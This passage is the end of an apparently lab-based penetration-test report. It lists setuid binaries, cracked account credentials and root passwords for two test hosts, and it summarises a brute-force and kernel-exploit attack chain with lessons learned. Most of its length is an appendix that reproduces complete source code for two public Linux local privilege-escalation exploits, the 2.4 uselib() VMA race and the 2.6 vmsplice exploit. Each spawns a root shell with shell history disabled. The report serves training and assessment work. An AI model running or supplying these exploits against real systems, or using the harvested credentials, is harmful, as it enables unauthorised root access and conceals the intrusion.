/usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/passwd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/kerberos/bin/ksu, /usr/libexec/openssh/ssh-keysign, /usr/sbin/ccreds_validate, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: cptvm1/windows, cptvm2/linux, r00t/windows, root/admin

L. Ultimate goal
i. cptvm1 and cptvm2 hosts compromised
The initial access to the cptvm1 host was obtained by brute force
password guessing of the user account. After gaining basic access to the
cptvm1 host, the cptvm1 and cptvm2 user accounts were brute force
password attacked. This provided basic access to the cptvm2 host. The
cptvm1 host was then compromised via a VMA exploit. Next, the cptvm2
host was compromised via a vmsplice exploit. Finally, the root
passwords were cracked.
ii. Passwords for root accounts on cptvm1 and cptvm2
The password for root@cptvm1 is cavalry
The password for root@cptvm2 is admin

M. Lessons learned
i. Searching exploit sites
The quality of the exploits and exploit information varies radically
between sites. For example, the milw0rm.com site has good quality
code but limited information on the background of the exploit. In
contrast, the www.securityfocus.com site has more extensive
information about an exploit but may only state "Exploit code has been
published" instead of providing actual exploit code.
With such a wide footprint for searches in mind, a site like
secwatch.org should be the preferred solution. However, it was found
that certain searches don't perform well via secwatch.org.
The use of a single site to complete exploit research isn't going to be a
successful approach at this time.
ii. Attack vectors
All of the articles that I have read and the individuals that I have
spoken with lately state that the majority of future exploits will be
found outside of the operating system. With this in mind, I focused
my search on items surrounding the kernel but waited to research the
kernel exploits until the end. This proved to be exactly the opposite of
the approach that was required for this examination.
Full research into the vulnerabilities of a target prior to attempting to
execute any exploits is key. If this approach had been adhered to
more closely, a full review of all of the vulnerabilities would have
yielded the kernel exploits as the top contenders. This would have saved
quite a bit of time compiling, debugging and testing unsuccessful
exploits.

5. Appendix
A. Source code for the Kernel 2.4 VMA exploit
/*
* Linux kernel 2.4 uselib() privilege elevation exploit.
*
* original exploit source from http://isec.pl
* reference: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
*
* I modified the Paul Starzetz's exploit, made it more possible
* to race successfully. The exploit still works only on 2.4 series.
* It should be also works on 2.4 SMP, but not easy.
*
* thx newbug.
*
* Tim Hsu <timhsu at chroot.org> Jan 2005.
*
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <sched.h>
#include <syscall.h>
#include <limits.h>

#include <sys/types.h>
#include <sys/wait.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <sys/sysinfo.h>

#include <linux/elf.h>
#include <linux/linkage.h>
#include <asm/page.h>
#include <asm/ldt.h>
#include <asm/segment.h>
#define str(s) #s
#define xstr(s) str(s)
#define MREMAP_MAYMOVE

// temp lib location
#define LIBNAME "/tmp/_elf_lib"
// shell name
#define SHELL "/bin/bash"

// time delta to detect race
#define RACEDELTA 5000
// if you have more deadbabes in memory, change this
#define MAGIC 0xdeadbabe
// do not touch
#define SLAB_THRSH 128
#define SLAB_PER_CHLD (INT_MAX - 1)
#define LIB_SIZE ( PAGE_SIZE * 4 )
#define STACK_SIZE ( PAGE_SIZE * 4 )
#define LDT_PAGES ( (LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1)/PAGE_SIZE )

#define ENTRY_GATE ( LDT_ENTRIES-1 )
#define SEL_GATE ( (ENTRY_GATE<<3)|0x07 )
#define ENTRY_LCS ( ENTRY_GATE-2 )
#define SEL_LCS ( (ENTRY_LCS<<3)|0x04 )
#define ENTRY_LDS ( ENTRY_GATE-1 )
#define SEL_LDS ( (ENTRY_LDS<<3)|0x04 )

#define kB * 1024
#define MB * 1024 kB
#define GB * 1024 MB

#define TMPLEN 256
#define PGD_SIZE ( PAGE_SIZE*1024 )
extern char **environ;


static char cstack[STACK_SIZE];
static char name[TMPLEN];
static char line[TMPLEN];
static pid_t consume_pid;
static volatile int
val = 0,
go = 0,
finish = 0,
scnt = 0,
ccnt=0,

delta = 0,
delta_max = RACEDELTA,
map_flags = PROT_WRITE|PROT_READ;
static int
fstop=0,
silent=0,
pidx,
pnum=0,
smp_max=0,
smp,
wtime=2,
cpid,
uid,
task_size,
old_esp,
lib_addr,
map_count=0,
map_base=0,
map_addr,
addr_min,
addr_max,
vma_start,
vma_end,
max_page;
static struct timeval tm1, tm2;
static char *myenv[] = {"TERM=vt100",
"HISTFILE=/dev/null",
NULL};
static char hellc0de[] =
"\x49\x6e\x74\x65\x6c\x65\x63\x74\x75\x61\x6c\x20\x70\x72\x6f\x70"
"\x65\x72\x74\x79\x20\x6f\x66\x20\x49\x68\x61\x51\x75\x65\x52\x00";
static char *pagemap, *libname=LIBNAME, *shellname=SHELL;

#define __NR_sys_gettimeofday __NR_gettimeofday
#define __NR_sys_sched_yield __NR_sched_yield
#define __NR_sys_madvise __NR_madvise
#define __NR_sys_uselib __NR_uselib
#define __NR_sys_mmap2 __NR_mmap2
#define __NR_sys_munmap __NR_munmap
#define __NR_sys_mprotect __NR_mprotect
#define __NR_sys_mremap __NR_mremap

inline _syscall6(int, sys_mmap2, int, a, int, b, int, c, int, d, int, e, int, f);
inline _syscall5(int, sys_mremap, int, a, int, b, int, c, int, d, int, e);
inline _syscall3(int, sys_madvise, void*, a, int, b, int, c);
inline _syscall3(int, sys_mprotect, int, a, int, b, int, c);
inline _syscall3( int, modify_ldt, int, func, void *, ptr, int, bytecount );
inline _syscall2(int, sys_gettimeofday, void*, a, void*, b);
inline _syscall2(int, sys_munmap, int, a, int, b);
inline _syscall1(int, sys_uselib, char*, l);
inline _syscall0(void, sys_sched_yield);

// allocate and dirty all currently free RAM in a helper process
int consume_memory()
{
struct sysinfo info;
char *vmem;
sysinfo(&info);
vmem = malloc(info.freeram);
if (vmem == NULL)
{
perror("malloc");
return -1;
}
memset(vmem, 0x90, info.freeram);
return 0;
}
inline int tmdiff(struct timeval *t1, struct timeval *t2)
{
int r;
r=t2->tv_sec - t1->tv_sec;
r*=1000000;
r+=t2->tv_usec - t1->tv_usec;
return r;
}
void fatal(const char *message, int critical)
{
int sig = critical? SIGSTOP : (fstop? SIGSTOP : SIGKILL);
if(!errno) {
fprintf(stdout, "\n[-] FAILED: %s ", message);
} else {
fprintf(stdout, "\n[-] FAILED: %s (%s) ", message,
(char*) (strerror(errno)) );
}
if(critical)
printf("\nCRITICAL, entering endless loop");
printf("\n");
fflush(stdout);
unlink(libname);
kill(cpid, SIGKILL);
for(;;) kill(0, sig);
}
// try to race do_brk sleeping on kmalloc, may need modification for SMP
int raceme(void* v)
{
finish=1;
for(;;) {
errno = 0;
// check if raced:
recheck:
if(!go) sys_sched_yield();
sys_gettimeofday(&tm2, NULL);
delta = tmdiff(&tm1, &tm2);
if(!smp_max && delta < (unsigned)delta_max) goto recheck;
smp = smp_max;
// check if lib VMAs exist as expected under race condition
recheck2:
val = sys_madvise((void*) lib_addr, PAGE_SIZE, MADV_NORMAL);
if(val) continue;
errno = 0;
val = sys_madvise((void*) (lib_addr+PAGE_SIZE),
LIB_SIZE-PAGE_SIZE, MADV_NORMAL);
if( !val || (val<0 && errno!=ENOMEM) ) continue;
// SMP?
smp--;
if(smp>=0) goto recheck2;
// recheck race
if(!go) continue;
finish++;
// we need to free one vm_area_struct for mmap to work
val = sys_mprotect(map_addr, PAGE_SIZE, map_flags);
if(val) fatal("mprotect", 0);
val = sys_mmap2(lib_addr + PAGE_SIZE, PAGE_SIZE*3, PROT_NONE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(-1==val) fatal("mmap2 race", 0);
printf("\n[+] race won maps=%d", map_count); fflush(stdout);
kill(consume_pid, SIGKILL);
_exit(0);
}
return 0;
}
int callme_1()
{
return val++;
}
inline int valid_ptr(unsigned ptr)
{
return ptr>=task_size && ptr<addr_min-16;
}
inline int validate_vma(unsigned *p, unsigned s, unsigned e)
{
unsigned *t;
if(valid_ptr(p[0]) && valid_ptr(p[3]) && p[1]==s && p[2]==e) {
t=(unsigned*)p[3];
if( t[0]==p[0] && t[1]<=task_size && t[2]<=task_size )
return 1;
}
return 0;
}
asmlinkage void kernel_code(unsigned *task)
{
unsigned *addr = task;
// find & reset uids
while(addr[0] != uid || addr[1] != uid ||
addr[2] != uid || addr[3] != uid)
addr++;
addr[0] = addr[1] = addr[2] = addr[3] = 0;
addr[4] = addr[5] = addr[6] = addr[7] = 0;
// find & correct VMA
for(addr=(unsigned *)task_size; (unsigned)addr<addr_min-16; addr++) {
if( validate_vma(addr, vma_start, vma_end) ) {
addr[1] = task_size - PAGE_SIZE;
addr[2] = task_size;
break;
}
}
}
void kcode(void);
// CPL0 code mostly stolen from cliph
void __kcode(void)
{
asm(
"kcode:                              \n"
"    pusha                           \n"
"    pushl %es                       \n"
"    pushl %ds                       \n"
"    movl $(" xstr(SEL_LDS) ") ,%edx \n"
"    movl %edx,%es                   \n"
"    movl %edx,%ds                   \n"
"    movl $0xffffe000,%eax           \n"
"    andl %esp,%eax                  \n"
"    pushl %eax                      \n"
"    call kernel_code                \n"
"    addl $4, %esp                   \n"
"    popl %ds                        \n"
"    popl %es                        \n"
"    popa                            \n"
"    lret                            \n"
);
}

int callme_2()
{
return val + task_size + addr_min;
}
void sigfailed(int v)
{
ccnt++;
fatal("lcall", 1);
}
// modify LDT & exec
void try_to_exploit(unsigned addr)
{
volatile int r, *v;
printf("\n[!] try to exploit 0x%.8x", addr); fflush(stdout);
unlink(libname);
r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE|map_flags);
if(r) fatal("mprotect 1", 1);
// check if really LDT
v = (void*) (addr + (ENTRY_GATE*LDT_ENTRY_SIZE % PAGE_SIZE) );
signal(SIGSEGV, sigfailed);
r = *v;
if(r != MAGIC) {
printf("\n[-] FAILED val = 0x%.8x", r); fflush(stdout);
fatal("find LDT", 1);
}
// yeah, setup CPL0 gate
v[0] = ((unsigned)(SEL_LCS)<<16) | ((unsigned)kcode & 0xffffU);
v[1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;
printf("\n[+] gate modified ( 0x%.8x 0x%.8x )", v[0], v[1]);
fflush(stdout);
// setup CPL0 segment descriptors (we need the 'accessed' versions ;-)
v = (void*) (addr + (ENTRY_LCS*LDT_ENTRY_SIZE % PAGE_SIZE) );
v[0] = 0x0000ffff; /* kernel 4GB code at 0x00000000 */
v[1] = 0x00cf9b00;
v = (void*) (addr + (ENTRY_LDS*LDT_ENTRY_SIZE % PAGE_SIZE) );
v[0] = 0x0000ffff; /* kernel 4GB data at 0x00000000 */
v[1] = 0x00cf9300;
// reprotect to get only one big VMA
r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|map_flags);
if(r) fatal("mprotect 2", 1);
// CPL0 transition
sys_sched_yield();
val = callme_1() + callme_2();
asm("lcall $" xstr(SEL_GATE) ",$0x0");
//if( getuid()==0 || (val==31337 && strlen(hellc0de)==31337) ) {
if (getuid()==0) {
printf("\n[+] exploited, uid=0\n\n" ); fflush(stdout);
} else {
printf("\n[-] uid change failed" ); fflush(stdout);
sigfailed(0);
}
signal(SIGTERM, SIG_IGN);
kill(0, SIGTERM);
setresuid(0, 0, 0);
execl(shellname, "sh", NULL);
fatal("execl", 0);
}
void scan_mm_finish();
void scan_mm_start();
// kernel page table scan code
void scan_mm()
{
map_addr -= PAGE_SIZE;
if(map_addr <= (unsigned)addr_min)
scan_mm_start();
scnt=0;
val = *(int*)map_addr;
scan_mm_finish();
}
void scan_mm_finish()
{
retry:
__asm__("movl %0, %%esp" : :"m"(old_esp) );
if(scnt) {
pagemap[pidx] ^= 1;
}
else {
sys_madvise((void*)map_addr, PAGE_SIZE, MADV_DONTNEED);
}
pidx--;
scan_mm();
goto retry;
}
// make kernel page maps before and after allocating LDT
void scan_mm_start()
{
static int npg=0;
static struct modify_ldt_ldt_s l;
//static struct user_desc l;
pnum++;
if(pnum==1) {
pidx = max_page-1;
}
else if(pnum==2) {
memset(&l, 0, sizeof(l));
l.entry_number = LDT_ENTRIES-1;
l.seg_32bit = 1;
l.base_addr = MAGIC >> 16;
l.limit = MAGIC & 0xffff;
l.limit_in_pages = 1;
if( modify_ldt(1, &l, sizeof(l)) != 0 )
fatal("modify_ldt", 1);
pidx = max_page-1;
}
else if(pnum==3) {
npg=0;
for(pidx=0; pidx<=max_page-1; pidx++) {
if(pagemap[pidx]) {
npg++;
}
else if(npg == LDT_PAGES) {
npg=0;
try_to_exploit(addr_min+(pidx-1)*PAGE_SIZE);
} else {
npg=0;
}
}
fatal("find LDT", 1);
}
// save context & scan page table
__asm__("movl %%esp, %0" : :"m"(old_esp) );
map_addr = addr_max;
scan_mm();
}
// return number of available SLAB objects in cache
int get_slab_objs(const char *sn)
{
static int c, d, u = 0, a = 0;
FILE *fp=NULL;
char x1[20];
fp = fopen("/proc/slabinfo", "r");
if(!fp)
fatal("get_slab_objs: fopen", 0);
fgets(name, sizeof(name) - 1, fp);
do {
c = u = a = -1;
if (!fgets(line, sizeof(line) - 1, fp))
break;
c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a,
&d, &d, &d, &d);
} while (strcmp(name, sn));
close(fileno(fp));
fclose(fp);
return c == 7 ? a - u : -1;
}
long memmaped_size = 0;
// leave one object in the SLAB
inline void prepare_slab()
{
int *r;
map_addr -= PAGE_SIZE;
map_count++;
map_flags ^= PROT_READ;
r = (void*)sys_mmap2((unsigned)map_addr, PAGE_SIZE, map_flags,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(MAP_FAILED == r) {
printf("--> prepare_slab(), %ldMb\n", memmaped_size/1024/1024);
fatal("try again", 0);
}
memmaped_size += PAGE_SIZE;
*r = map_addr;
}
// sig handlers
void segvcnt(int v)
{
scnt++;
scan_mm_finish();
}
// child reap
void reaper(int v)
{
ccnt++;
waitpid(0, &v, WNOHANG|WUNTRACED);
}
// sometimes I get the VMAs in reversed order...
// so just use anyone of the two but take care about the flags
void check_vma_flags();

void vreversed(int v)
{
map_flags = 0;
check_vma_flags();
}
void check_vma_flags()
{
if(map_flags) {
__asm__("movl %%esp, %0" : :"m"(old_esp) );
} else {
__asm__("movl %0, %%esp" : :"m"(old_esp) );
goto out;
}
signal(SIGSEGV, vreversed);
val = * (unsigned*)(lib_addr + PAGE_SIZE);
out: ;
}
// use elf library and try to sleep on kmalloc
void exploitme()
{
int r, sz, pcnt=0;
static char smiley[]="-\\|/-\\|/";
//printf("\n\tcat /proc/%d/maps", getpid() ); fflush(stdout);
// helper clone
finish=0; ccnt=0;
sz = sizeof(cstack) / sizeof(cstack[0]);
cpid = clone(&raceme, (void*) &cstack[sz-16],
CLONE_VM|CLONE_SIGHAND|CLONE_FS|SIGCHLD, NULL );
if(-1==cpid) fatal("clone", 0);
// synchronize threads
while(!finish) sys_sched_yield();
finish=0;
if(!silent) {
printf("\n"); fflush(stdout);
}
// try to hit the kmalloc race
for(;;) {
r = get_slab_objs("vm_area_struct");
//printf("\nfree slab = %d\n",r);
while(r != 1 && r > 0) {
prepare_slab();
r--;
}
sys_gettimeofday(&tm1, NULL);
go = 1;
r=sys_uselib(libname);
go = 0;
if(r) fatal("uselib", 0);
if(finish) break;
// wipe lib VMAs and try again
r = sys_munmap(lib_addr, LIB_SIZE);
if(r) fatal("munmap lib", 0);
if(ccnt) goto failed;
if( !silent && !(pcnt%64) ) {
printf("\r\tWait... %c", smiley[ (pcnt/64)%8 ]);
fflush(stdout);
}
pcnt++;
}
// seems we raced, free mem
r = sys_munmap(map_addr, map_base-map_addr + PAGE_SIZE);
if(r) fatal("munmap 1", 0);
r = sys_munmap(lib_addr, PAGE_SIZE);
if(r) fatal("munmap 2", 0);
// relax kswapd
sys_gettimeofday(&tm1, NULL);
for(;;) {
sys_sched_yield();
sys_gettimeofday(&tm2, NULL);
delta = tmdiff(&tm1, &tm2);
if( wtime*1000000U <= (unsigned)delta ) break;
}
// we need to check the PROT_EXEC flag
map_flags = PROT_EXEC;
check_vma_flags();
if(!map_flags) {
printf("\n\tVMAs reversed"); fflush(stdout);
}
// write protect brk's VMA to fool vm_enough_memory()
r = sys_mprotect((lib_addr + PAGE_SIZE), LIB_SIZE-PAGE_SIZE,
PROT_READ|map_flags);
if(-1==r) { fatal("mprotect brk", 0); }
// this will finally make the big VMA...
sz = (0-lib_addr) - LIB_SIZE - PAGE_SIZE;
expand:
r = sys_madvise((void*)(lib_addr + PAGE_SIZE),
LIB_SIZE-PAGE_SIZE, MADV_NORMAL);
if(r) fatal("madvise", 0);
r = sys_mremap(lib_addr + LIB_SIZE-PAGE_SIZE,
PAGE_SIZE, sz, MREMAP_MAYMOVE, 0);
if(-1==r) {
if(0==sz) {
fatal("mremap: expand VMA", 0);
} else {
sz -= PAGE_SIZE;
goto expand;
}
}
vma_start = lib_addr + PAGE_SIZE;
vma_end = vma_start + sz + 2*PAGE_SIZE;
printf("\n\texpanded VMA (0x%.8x-0x%.8x)", vma_start, vma_end);
fflush(stdout);
// try to figure kernel layout
signal(SIGCHLD, reaper);
signal(SIGSEGV, segvcnt);
signal(SIGBUS, segvcnt);
scan_mm_start();
failed:
printf("failed:\n");
fatal("try again", 0);
}
//
make fake ELF library
void make_lib()
{
struct elfhdr eh;
struct elf_phdr eph;
static char tmpbuf[PAGE_SIZE];
int fd;
// make our elf library
umask(022);
unlink(libname);
fd=open(libname, O_RDWR|O_CREAT|O_TRUNC, 0755);
if(fd<0) fatal("open lib ("LIBNAME" not writable?)", 0);
memset(&eh, 0, sizeof(eh) );
// elf exec header
memcpy(eh.e_ident, ELFMAG, SELFMAG);
eh.e_type = ET_EXEC;
eh.e_machine = EM_386;
eh.e_phentsize = sizeof(struct elf_phdr);
eh.e_phnum = 1;
eh.e_phoff = sizeof(eh);
write(fd, &eh, sizeof(eh) );
// section header:
memset(&eph, 0, sizeof(eph) );
eph.p_type = PT_LOAD;
eph.p_offset = 4096;
eph.p_filesz = 4096;
eph.p_vaddr = lib_addr;
eph.p_memsz = LIB_SIZE;
eph.p_flags = PF_W|PF_R|PF_X;
write(fd, &eph, sizeof(eph) );
// execable code
lseek(fd, 4096, SEEK_SET);
memset(tmpbuf, 0x90, sizeof(tmpbuf) );
write(fd, &tmpbuf, sizeof(tmpbuf) );
close(fd);

}
//
move stack down #2
void prepare_finish()
{
int r;
static struct sysinfo si;
old_esp &= ~(PAGE_SIZE-1);
old_esp -= PAGE_SIZE;
task_size = ((unsigned)old_esp + 1 GB ) / (1 GB) * 1 GB;
r = sys_munmap(old_esp, task_size-old_esp);
if(r) fatal("unmap stack", 0);
// setup rt env
uid = getuid();
lib_addr = task_size - LIB_SIZE - PAGE_SIZE;
if(map_base)
map_addr = map_base;
else
map_base = map_addr = (lib_addr - PGD_SIZE) & ~(PGD_SIZE-1);
printf("\n[+] moved stack %x, task_size=0x%.8x, map_base=0x%.8x",
old_esp, task_size, map_base); fflush(stdout);
// check physical mem & prepare
sysinfo(&si);
addr_min = task_size + si.totalram;
addr_min = (addr_min + PGD_SIZE - 1) & ~(PGD_SIZE-1);
addr_max = addr_min + si.totalram;
if((unsigned)addr_max >= 0xffffe000 || (unsigned)addr_max <
(unsigned)addr_min)
addr_max = 0xffffd000;
printf("\n[+] vmalloc area 0x%.8x - 0x%.8x", addr_min, addr_max);
max_page = (addr_max - addr_min) / PAGE_SIZE;
pagemap = malloc( max_page + 32 );
if(!pagemap) fatal("malloc pagemap", 1);
memset(pagemap, 0, max_page + 32);
// go go
make_lib();
exploitme();

}
//
move stack down #1
void prepare()
{
unsigned p=0;
environ = myenv;
p = sys_mmap2( 0, STACK_SIZE, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0 );
if(-1==p) fatal("mmap2 stack", 0);
p += STACK_SIZE - 64;
__asm__("movl %%esp, %0 \n"
"movl %1, %%esp \n"
: : "m"(old_esp), "m"(p)
);
prepare_finish();
}
void chldcnt(int v)
{
ccnt++;
}
// alloc slab objects...
inline void do_wipe()
{
int *r, c=0, left=0;
__asm__("movl %%esp, %0" : : "m"(old_esp) );
old_esp = (old_esp - PGD_SIZE+1) & ~(PGD_SIZE-1);
old_esp = map_base? map_base : old_esp;
for(;;) {
if(left<=0)
left = get_slab_objs("vm_area_struct");
if(left <= SLAB_THRSH)
break;
left--;
map_flags ^= PROT_READ;
old_esp -= PAGE_SIZE;
r = (void*)sys_mmap2(old_esp, PAGE_SIZE, map_flags,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0 );
if(MAP_FAILED == r)
break;
if(c>SLAB_PER_CHLD)
break;
if( (c%1024)==0 ) {
if(!c) printf("\n");
printf("\r\tchild %d VMAs %d", val, c);
fflush(stdout);
}
c++;
}
printf("\r\tchild %d VMAs %d", val, c);
fflush(stdout);
kill(getppid(), SIGUSR1);
for(;;) pause();
}
// empty SLAB caches
void wipe_slab()
{
signal(SIGUSR1, chldcnt);
printf("\n[+] SLAB cleanup"); fflush(stdout);
for(;;) {
ccnt=0;
val++;
cpid = fork();
if(!cpid)
do_wipe();
while(!ccnt) sys_sched_yield();
if( get_slab_objs("vm_area_struct") <= SLAB_THRSH )
break;
}
signal(SIGUSR1, SIG_DFL);
}
void usage(char *n)
{
printf("\nUsage: %s\t-f forced stop\n", n);
printf("\t\t-s silent mode\n");
printf("\t\t-c command to run\n");
printf("\t\t-n SMP iterations\n");
printf("\t\t-d race delta us\n");
printf("\t\t-w wait time seconds\n");
printf("\t\t-l alternate lib name\n");
printf("\t\t-a alternate addr hex\n");
printf("\n");
_exit(1);
}
// give -s for forced stop, -b to clean SLAB
int main(int ac, char **av)
{
int r;

while(ac) {
r = getopt(ac, av, "n:l:a:w:c:d:fsh");
if(r<0) break;
switch(r) {
case 'f' :
fstop = 1;
break;
case 's' :
silent = 1;
break;
case 'n' :
smp_max = atoi(optarg);
break;
case 'd':
if(1!=sscanf(optarg, "%u", &delta_max) || delta_max >
100000u )
fatal("bad delta value", 0);
break;
case 'w' :
wtime = atoi(optarg);
if(wtime<0) fatal("bad wait value", 0);
break;
case 'l' :
libname = strdup(optarg);
break;
case 'c' :
shellname = strdup(optarg);
break;
case 'a' :
if(1!=sscanf(optarg, "%x", &map_base))
fatal("bad addr value", 0);
map_base &= ~(PGD_SIZE-1);
break;
case 'h' :
default:
usage(av[0]);
break;
}
}
consume_pid = fork();
if (consume_pid == 0)
{
consume_memory();
pause();
return 0;
}
// basic setup
uid = getuid();
setpgrp();
wipe_slab();
prepare();

return 0;
}

// milw0rm.com [2005-01-27]

B. Source code for the Kernel 2.6 vmsplice exploit


/*
* jessica_biel_naked_in_my_bed.c
*
* I roll in from the pub and see that Wojta has nothing to do again, dammit.
* Kids, here is a little something to play with, before this one gets blabbed out too.
* Anyway it is old as hell and somewhat broken.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remember the original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void *get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}
#elif defined (__x86_64__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void *get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}
#else
#error "unsupported arch"
#endif
#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)
#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
int i;
uint *p = get_current();

for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}
exit_kernel();
}
void exit_code()
{
if (getuid() != 0)
die("wtf", 0);
printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);
}
int main(int argc, char *argv[])
{
int pi[2];
size_t map_size;
char *map_addr;
struct iovec iov;
struct page *pages[5];
uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);
printf("-----------------------------------\n");
printf(" Linux vmsplice Local Root Exploit\n");
printf(" By qaaz\n");
printf("-----------------------------------\n");
if (!uid || !gid)
die("!@#$", 0);
/*****/
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);
pages[0]->flags = 1 << PG_compound;
pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;

/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);
pages[2]->flags = 1 << PG_compound;
pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;

/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);
/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);
/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);
iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;
signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}
// milw0rm.com [2008-02-09]
